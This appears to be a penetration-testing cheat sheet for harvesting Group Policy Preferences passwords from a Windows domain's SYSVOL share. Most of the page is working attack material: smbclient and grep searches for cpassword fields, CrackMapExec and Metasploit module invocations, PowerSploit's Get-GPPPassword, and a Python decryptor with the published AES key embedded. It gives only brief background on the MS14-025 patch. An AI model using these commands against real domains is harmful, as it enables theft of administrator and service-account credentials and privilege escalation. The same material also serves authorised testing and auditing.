Skip to main content

Overview

Group Policy Preferences (GPP) stored credentials in cpassword field in XML files on SYSVOL. AES key was published by Microsoft → any domain user can decrypt.

Find GPP Files

Manual

smbclient //DC_IP/SYSVOL -U 'user%password'
find /mnt/sysvol -name "*.xml" -exec grep -l "cpassword" {} \;
Look in:
  • Groups.xml — local admin passwords
  • Services.xml — service account passwords
  • Scheduledtasks.xml — scheduled task credentials
  • DataSources.xml — database credentials
  • Drives.xml — mapped drive credentials
  • Printers.xml — printer credentials

CrackMapExec

crackmapexec smb DC_IP -u user -p password -M gpp_password

Metasploit

use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

Decrypt cpassword

gpp-decrypt

gpp-decrypt "ENCRYPTED_CPASSWORD"

Python

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
iv = b'\x00' * 16
cpassword = "CPASSWORD_HERE"
cpassword += "=" * (-len(cpassword) % 4)   # GPP strips base64 padding — re-add it
enc = base64.b64decode(cpassword)
cipher = AES.new(key, AES.MODE_CBC, iv)
print(unpad(cipher.decrypt(enc), AES.block_size).decode('utf-16-le'))

Get-GPPPassword (PowerSploit)

Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

Notes

  • MS14-025 patched creation of new GPP passwords (2014)
  • Existing GPP passwords NOT removed by patch
  • Old domains often still have them in SYSVOL
  • Any authenticated domain user can read SYSVOL

Quick Reference

TaskCommand
CMEcrackmapexec smb DC -u user -p pass -M gpp_password
Decryptgpp-decrypt "cpassword"
ManualSearch SYSVOL for *.xml with cpassword
PowerSploitGet-GPPPassword